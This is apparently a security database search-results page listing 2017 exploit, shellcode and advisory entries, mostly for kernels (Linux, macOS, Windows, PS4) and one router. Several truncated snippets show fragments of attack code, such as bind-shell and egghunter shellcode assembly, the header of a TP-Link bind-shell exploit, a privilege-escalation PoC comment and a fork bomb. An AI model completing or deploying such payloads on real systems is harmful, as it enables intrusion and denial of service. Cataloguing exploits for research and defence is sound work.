Lucene search
K

1576 matches found

exploitpack
exploitpack
added 2017/12/27 12:0 a.m.24 views

Sony Playstation 4 (PS4) 4.05 - Jailbreak WebKit NamedObj Kernel Loader

Sony Playstation 4 PS4 4.05 - Jailbreak WebKit NamedObj Kernel Loader PS4 4.05 Kernel Exploit --- Summary In this project you will find a full implementation of the "namedobj" kernel exploit for the PlayStation 4 on 4.05. It will allow you to run arbitrary code as kernel, to allow jailbreaking an...

7.4AI score
Exploits0
0day.today
0day.today
added 2017/12/12 12:0 a.m.53 views

macOS getrusage Stack Leak Exploit

Exploit for macOS platform in category dos / poc MacOS getrusage stack leak through struct padding CVE-2017-13869 For 64-bit processes, the getrusage syscall handler converts a struct rusage to a struct user64rusage using mungeuser64rusage, then copies the struct user64rusage to userspace: int...

4.3CVSS6.4AI score0.04736EPSS
Exploits3
Exploit DB
Exploit DB
added 2017/12/12 12:0 a.m.55 views

Apple XNU Kernel - Memory Corruption due to Integer Overflow in __offsetof Usage in posix_spawn on 32-bit Platforms

posixspawn is a complex syscall which takes a lot of arguments from userspace. The third argument is a pointer to a further arguments descriptor in userspace with the following structure on 32-bit: struct user32posixspawnargsdesc uint32t attrsize; / size of attributes block / uint32t attrp; /...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2017/12/11 12:0 a.m.34 views

Apple macOS - 'getrusage' Stack Leak Through struct Padding

/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1405 For 64-bit processes, the getrusage syscall handler converts a struct rusage to a struct user64rusage using mungeuser64rusage, then copies the struct user64rusage to userspace: int getrusagestruct proc p, struct getrusagearg...

7.4AI score
Exploits0
OSV
OSV
added 2017/11/29 3:29 a.m.2 views

DEBIAN-CVE-2017-17053

The initnewcontext function in arch/x86/include/asm/mmucontext.h in the Linux kernel before 4.12.10 does not correctly handle errors from LDT table allocation when forking a new process, allowing a local attacker to achieve a use-after-free or possibly have unspecified other impact by running a...

7CVSS6.5AI score0.00376EPSS
Exploits0References1
OSV
OSV
added 2017/11/29 3:29 a.m.0 views

UBUNTU-CVE-2017-17053

The initnewcontext function in arch/x86/include/asm/mmucontext.h in the Linux kernel before 4.12.10 does not correctly handle errors from LDT table allocation when forking a new process, allowing a local attacker to achieve a use-after-free or possibly have unspecified other impact by running a...

7CVSS6.8AI score0.00376EPSS
Exploits0References5
0day.today
0day.today
added 2017/11/25 12:0 a.m.29 views

Linux - mincore() Uninitialized Kernel Heap Page Disclosure Exploit

Linux mincore discloses uninitialized kernel heap pages. When walkpagerange is used on a VMHUGETLB VMA, callbacks from the mmwalk structure are only invoked for present pages. However, domincore assumes that it will always get callbacks for all pages in the range passed to walkpagerange, and when...

6.8AI score
Exploits0
Exploit DB
Exploit DB
added 2017/11/23 12:0 a.m.24 views

Linux/x64 - Egghunter (0xbeefbeef) Shellcode (34 bytes)

Linux/x64 - Egghunter 0xbeefbeef Shellcode 34 bytes. Shellcode exploit for Linuxx86-64 platform global start section .text start: xor rsi,rsi push rsi ; starts the search at position 0 pop rdi nextpage: or di,0xfff inc rdi next4bytes: push 21 pop rax syscall cmp al,0xf2 jz nextpage mov...

7.1AI score
Exploits0
n0where
n0where
added 2017/11/14 8:21 p.m.255 views

Unsupervised Coverage-Guided Kernel Fuzzer: syzkaller

syzkaller is an unsupervised coverage-guided kernel fuzzer. Linux kernel fuzzing has the most support, akaros, freebsd, fuchsia, netbsd and windows are supported to varying degrees. Initially, syzkaller was developed with Linux kernel fuzzing in mind, but now it’s being extended to support other ...

7.1AI score
Exploits0References16
Exploit DB
Exploit DB
added 2017/11/09 12:0 a.m.6189 views

Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)

Linux/x64 - Bind TCP 4444/TCP Shell /bin/sh + Password 1234567 Shellcode 136 bytes. Shellcode exploit for Linuxx86-64 platform global start start: ; sock = socketAFINET, SOCKSTREAM, 0 ; AFINET = 2 ; SOCKSTREAM = 1 ; syscall number 41 push 41 pop rax push 2 pop rdi push 1 pop rsi cdq syscall ; cop...

7.1AI score
Exploits0
Packet Storm
Packet Storm
added 2017/11/07 12:0 a.m.93 views

Linux Kernel 4.1.3 (Ubuntu 17.10) waitid() SMEP/SMAP Privilege Escalation

// Proof of concept exploit for waitid bug introduced in Linux Kernel 4.13 // By Chris Salls twitter.com/chrissalls // This exploit can be used to break out out of sandboxes such as that in google chrome // In this proof of concept we install the seccomp filter from chrome as well as a chroot, //...

7.9AI score0.03714EPSS
Exploits10
seebug.org
seebug.org
added 2017/10/24 12:0 a.m.104 views

Linux Kernel 4.14.0-rc4+ - 'waitid()' Privilege Escalation(CVE-2017-5123)

This is a guest post by a young and talented Portuguese exploiter, Federico Bento. He won this year’s Pwnie for Epic Achievement exploiting TIOCSTI ioctl. Days ago he posted a video demonstrating an exploit for CVE-2017-5123 and luckly for you I managed to convince him to do a write-up about it. ...

8.2AI score0.03714EPSS
Exploits10
exploitpack
exploitpack
added 2017/10/17 12:0 a.m.15 views

Microsoft Windows - nt!NtQueryObject (ObjectNameInformation) Kernel Pool Memory Disclosure

Microsoft Windows - nt!NtQueryObject ObjectNameInformation Kernel Pool Memory Disclosure / Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1303&desc=2 We have discovered that the nt!NtQueryObject syscall handler discloses portions of uninitialized pool memory to user-mode client...

7.4AI score
Exploits0
exploitpack
exploitpack
added 2017/10/17 12:0 a.m.16 views

TP-Link WR940N - (Authenticated) Remote Code

TP-Link WR940N - Authenticated Remote Code import urllib2 import base64 import hashlib from optparse import import sys import urllibbanner = "\n" "WR940N Authenticated Remote Code Exploit\n" "This exploit will open a bind shell on the remote target\n" "The port is 31337, you can change that in th...

7.8AI score
Exploits0
ArchLinux
ArchLinux
added 2017/10/17 12:0 a.m.34 views

[ASA-201710-26] linux: privilege escalation

Arch Linux Security Advisory ASA-201710-26 ========================================== Severity: High Date : 2017-10-17 CVE-ID : CVE-2017-5123 Package : linux Type : privilege escalation Remote : No Link : https://security.archlinux.org/AVG-444 Summary ======= The package linux before version...

8.8CVSS1.5AI score0.03714EPSS
Exploits10References4
seebug.org
seebug.org
added 2017/10/13 12:0 a.m.54 views

Kaspersky Internet Security KLIF Driver NtAdjustTokenPrivileges_HANDLER Denial of Service(CVE-2016-4305)

Summary A denial of service vulnerability exists in the syscall filtering functionality of Kaspersky Internet Security KLIF driver. A specially crafted native api call can cause a access violation in KLIF kernel driver resulting in local denial of service. An attacker can run program from user mo...

2.1CVSS5.6AI score0.0049EPSS
Exploits2
seebug.org
seebug.org
added 2017/10/13 12:0 a.m.28 views

Kaspersky Internet Security KLIF Driver NtUserCreateWindowEx_HANDLER Denial of Service(CVE-2016-4304)

Summary A denial of service vulnerability exists in the syscall filtering functionality of the Kaspersky Internet Security KLIF driver. A specially crafted native api call request can cause a access violation exception in KLIF kernel driver resulting in local denial of service. An attacker can ru...

2.1CVSS5.5AI score0.0049EPSS
Exploits2
0day.today
0day.today
added 2017/09/11 12:0 a.m.31 views

Linux/ARM (Raspberry Pi) - Bind TCP Shell (4444/TCP) Shellcode (192 bytes)

/ Andrea Sindoni - @invictus1306 This schellcode is part of my episodes: - ARM exploitation for IoT - https://quequero.org/2017/07/arm-exploitation-iot-episode-2/ Enviroment: Raspberry pi 3 Default settings for port:4444 @.syntax unified .global start start: mov r1, 0x5C @ r1=0x5c mov r5, 0x11 @...

7.4AI score
Exploits0
OSV
OSV
added 2017/09/05 12:0 a.m.2 views

UBUNTU-CVE-2017-14140

The movepages system call in mm/migrate.c in the Linux kernel before 4.12.9 doesn't check the effective uid of the target process, enabling a local attacker to learn the memory layout of a setuid executable despite ASLR...

5.5CVSS6.7AI score0.00469EPSS
Exploits0References9
0day.today
0day.today
added 2017/08/21 12:0 a.m.21 views

Linux/x86_64 - Fork Bomb Shellcode (11 bytes)

/ ;Title: Linux/x8664 - fork Bomb 11 bytes ;Author: Touhid M.Shaikh ;Contact: https://twitter.com/touhidshaikh ;Category: Shellcode ;Architecture: Linux x8664 ;Description: WARNING! this shellcode may crash your computer if executed in your system. ;Shellcode Length: 11 ;Tested on : Debian...

Exploits0
Rows per page
Query Builder